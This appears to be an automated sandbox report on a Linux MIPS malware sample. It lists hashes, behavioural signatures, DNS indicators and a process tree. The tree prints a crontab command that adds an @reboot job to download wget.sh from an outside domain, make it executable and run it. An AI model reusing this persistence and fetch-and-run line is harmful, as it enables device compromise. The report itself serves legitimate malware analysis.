Analysis
-
max time kernel
143s -
max time network
140s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
27-10-2024 02:24
Static task
static1
Behavioral task
behavioral1
Sample
5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
Resource
debian9-mipsbe-20240611-en
General
-
Target
5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
-
Size
99KB
-
MD5
36e86bb02185647aa672a226e7fe224f
-
SHA1
66de8267b6fbef3423a21ed56e1fd68265882666
-
SHA256
5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb
-
SHA512
011ca601c3481c0ef30b4f3481e88dd05e329f1e129229cf5921e6ebf5b78806d6c8568a25ad0dd62cfd790e97fbf3d74efc047a457245647ebc939814c88cf0
-
SSDEEP
1536:F6KyNOhiWfjZsF1LtLGgZRSKRSaySRUUkvjMS1BEYoiueZ9DWK+FSn+:fzh1slGgCvjMS1KdC+w+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Renames itself 1 IoCs
Processes:
5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elfpid process 709 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf -
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 70.34.254.19 Destination IP 185.181.61.24 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.dQCYhx crontab -
Changes its process name 1 IoCs
Processes:
5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elfdescription ioc pid process Changes the process name, possibly in an attempt to hide itself /bin/sh /etc/init.d/rcS 709 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf -
Processes:
crontabcrontab5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elfdescription ioc process File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems crontab File opened for reading /proc/mounts 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
Processes
-
/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf1⤵
- Renames itself
- Changes its process name
- Reads runtime system information
PID:709 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"2⤵
- File and Directory Permissions Modification
PID:711 -
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:713 -
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:714
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
306B
MD5f3ce9d7a4a91e5fd83d71554c65e28dd
SHA192f5357290d7c8b4d7f31552e22f6c0c7b2c1248
SHA25631a0a02ee271e3d7233ac8ae401cb0b9c0561f6604e18077d4a1d5892616e1cf
SHA51211e5be7af45d81b7aec59b576cb46621f9c9d290cd8b2e619c777400ae8a2d9452d0c0e97662f5043e1d6622292100f3f20e69b747eb829288211544f597e2b0